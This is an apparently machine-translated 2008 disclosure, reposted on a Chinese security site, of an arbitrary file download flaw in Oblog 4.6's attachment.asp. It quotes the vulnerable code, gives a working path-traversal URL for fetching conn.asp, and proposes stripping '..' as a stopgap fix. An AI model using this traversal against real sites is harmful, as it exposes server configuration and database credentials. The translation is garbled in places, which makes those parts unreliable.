Really Supplement? Oblog vulnerability reproduce-bug warning-the black bar safety net

2008-05-02T00:00:00
ID MYHACK58:62200818933
Type myhack58
Reporter 佚名
Modified 2008-05-02T00:00:00

Description

Author: Tr4c3 Was this a gift just to give BK an instant group of friends to share, specifically say not to let get to engage in official, unfortunately or someone first to get the official test, let people is depressed, the T the people, block it. Today released to everyone.

##################################################################

Tr4c3[at]1 2 6[dot]com wrote in[2008-4-29] Copyright: http://www.nspcn.org/ http://www.tr4c3.com/ Bk instantly [QQ group] & Hi [QQ group]

##################################################################

Program download: http://down.oblog.cn/oblog4/oblog46_Final_20080403.rar

##################################################################

Description:

April Fool's Day engraving the brand in a blog published on a Oblog arbitrary File Download vulnerability. 文章 见 http://www.tr4c3.com/post/302.html <0day>April Fool's Day gift oblog File Download vulnerability. Subsequent official release of the Oblog version of the code do some changes, and post the relevant patches. See: the http://bbs.oblog.cn/dispbbs.asp?boardid=119&Id=1 3 2 3 7 5 [oblog46 experience Edition _patch_20080403 patch] http://www.target.com/attachment.asp?path=./conn.asp 这样 已经 无法 下载 文件 I From official download the latest version 4. 6 0 Final Build080403 Access(integrated attachment. asp patch), found that the modified code does not solve the problem,OBlog arbitrary File Download vulnerability still exists. Specific see attachment. asp code.

##################################################################

Key parts:

  1. Path = Trim(Request("path")) 'get the user submitted path
  2. FileID = Trim(Request("FileID"))
  3. If FileID ="" And Path = "" Then
  4. Response. Write "parameters"
  5. Response. End
  6. End If
  7. ...
  8. If CheckDownLoad Or 1= 1Then
  9. If Path = "" Then 1 0. set rs = Server. CreateObject("ADODB. RecordSet") 1 1. link_database 1 2. SQL = ("select file_path,userid,file_ext,ViewNum FROM oblog_upfile WHERE FileID = "&CLng(FileID)) 1 3. rs. open sql,conn,1,3 1 4. If Not rs. Eof Then 1 5. uid = rs(1) 1 6. file_ext = rs(2) 1 7. rs("ViewNum") = rs("ViewNum") + 1 1 8. rs. Update 1 9. downloadFile Server. MapPath(rs(0)),0 2 0. Else 2 1. Response. Status=4 0 4 2 2. Response. Write "the attachment does not exist!" 2 3. End If 2 4. rs. Close 2 5. Set rs = Nothing 2 6. Else 2 7. If InStr(path,Oblog. CacheConfig(5 6)) > 0 Then 'Tr4c3 label: note that here, only to determine the user submitted path is contains brought you, is true then call the downloadfile function to download the file 2 8. downloadFile Server. MapPath(Path),1 2 9. End if 3 0. End If 3 1. Else 3 2. 'If the attachment is a picture, when the limit test can not pass the call to a default image, to prevent the<img>tag can not be invoked, affect the display effect 3 3. If Path = "" Then 3 4. Response. Status=4 0 3 3 5. Response. Write ShowDownErr 3 6. Response. End 3 7. Else 3 8. downloadFile Server. MapPath(blogdir&"images/oblog_powered.gif"),1 3 9. End if 4 0. End if 4 1. 4 2. Set oblog = Nothing 4 3. 4 4. Sub downloadFile(strFile,stype) 4 5. On Error Resume Next 4 6. Server. ScriptTimeOut=9 9 9 9 9 9 9 4 7. Dim S,fso,f,intFilelength,strFilename 4 8. strFilename = strFile 4 9. Response. Clear 5 0. Set s = Server. CreateObject(oblog. CacheCompont(2)) 5 1. s. Open 5 2. s. Type = 1 5 3. Set fso = Server. CreateObject(oblog. CacheCompont(1)) 5 4. If Not fso. FileExists(strFilename) Then 5 5. If stype = 0 Then 5 6. Response. Status=4 0 4 5 7. Response. Write "the attachment has been deleted!" 5 8. Exit Sub 5 9. Else 6 0. strFilename = Server. MapPath(blogdir&"images/nopic.gif") 6 1. End if 6 2. End If 6 3. Set f = fso. GetFile(strFilename) 6 4. intFilelength = f. size 6 5. s. LoadFromFile(strFilename) 6 6. If Err Then 6 7. Response. Write("<h1>error: </h1>" & Err. Description & "<p>") 6 8. Response. End 6 9. End If 7 0. Set fso=Nothing 7 1. Dim Data 7 2. Data=s. Read 7 3. s. Close 7 4. Set s=Nothing 7 5. Dim ContentType 7 6. select Case LCase(Right(strFile, 4)) 7 7. Case ". asp",". mdb",". config",". js" 'Tr4c3 label: then look here, remember what? By the way, a few days ago I sent the boiling prospect news system of arbitrary download vulnerability with this inspection method is almost[http://www.tr4c3.com /post/306.html], the use of the method is also similar, and the magical"." Also come in handy. 7 8. Exit Sub 7 9. Case ". asf" 8 0. ContentType = "video/x-ms-asf" 8 1. Case ". avi" 8 2. ContentType = "video/avi" 8 3. Case ". doc" 8 4. ContentType = "application/msword" 8 5. Case ". zip" 8 6. ContentType = "application/zip" 8 7. Case ". xls" 8 8. ContentType = "application/vnd. ms-excel" 8 9. Case ". gif" 9 0. ContentType = "image/gif" 9 1. Case ". jpg", "jpeg" 9 2. ContentType = "image/jpeg" 9 3. Case ". wav" 9 4. ContentType = "audio/wav" 9 5. Case ". mp3" 9 6. ContentType = "audio/mpeg3" 9 7. Case ". mpg", "mpeg" 9 8. ContentType = "video/mpeg" 9 9. Case ". rtf" 1 0 0. ContentType = "application/rtf" 1 0 1. Case ". htm", "html" 1 0 2. ContentType = "text/html" 1 0 3. Case ". txt" 1 0 4. ContentType = "text/plain" 1 0 5. Case Else 1 0 6. ContentType = "application/octet-stream" 1 0 7. End select 1 0 8. If The Response. IsClientConnected Then 1 0 9. If Not (InStr(LCase(f. name),". gif")>0 Or InStr(LCase(f. name),". jpg")>0 Or InStr(LCase(f. name),". jpeg")>0 Or InStr(LCase(f. name),". bmp")>0 Or InStr(LCase(f. name),". png")>0 )Then 1 1 0. Response. AddHeader "Content-Disposition", "attachment; filename=" & amp; f. name 1 1 1. End If 1 1 2. Response. AddHeader "Content-Length", intFilelength 1 1 3. Response. CharSet = "UTF-8" 1 1 4. Response. ContentType = ContentType 1 1 5. Response. BinaryWrite Data 1 1 6. Response. Flush 1 1 7. Response. Clear() 1 1 8. End If 1 1 9. End Sub
##################################################################

Use method: http://www.target.com/attachment.asp?path=UploadFiles/../conn.asp.

##################################################################

Repair recommendations: Wait for the official release of new patches.

##################################################################

Temporary workaround: Will attachment. asp line 5 Path = Trim(Request(”path”)) changed to Path = Replace(Trim(Request(”path”)),”..”,”")

Popularity: 1 7% [[?] (<http://alexking.org/projects/wordpress/popularity-contest> "What does this mean?" )]